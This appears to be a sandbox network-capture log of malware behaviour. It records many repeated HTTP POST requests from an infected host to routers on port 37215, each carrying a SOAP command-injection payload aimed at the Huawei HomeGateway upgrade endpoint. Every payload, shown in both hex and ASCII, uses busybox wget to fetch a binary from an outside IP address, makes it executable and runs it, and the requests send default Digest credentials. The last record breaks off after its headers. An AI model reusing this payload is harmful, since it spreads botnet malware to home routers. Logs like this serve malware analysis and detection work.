                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              817192.168.2.1545764122.57.82.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230725050 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              818192.168.2.1558416102.193.243.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230773926 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              819192.168.2.1551940157.123.251.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230777979 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              820192.168.2.1554002122.242.247.637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230808020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              821192.168.2.153629837.115.192.19037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230854988 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              822192.168.2.1536852190.86.243.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230895042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              823192.168.2.1534162157.137.182.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230895996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              824192.168.2.154752041.179.144.7837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230899096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              825192.168.2.1533472121.79.164.5837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537744045 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              826192.168.2.1541536190.219.29.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537765026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              827192.168.2.154272241.172.42.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537789106 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
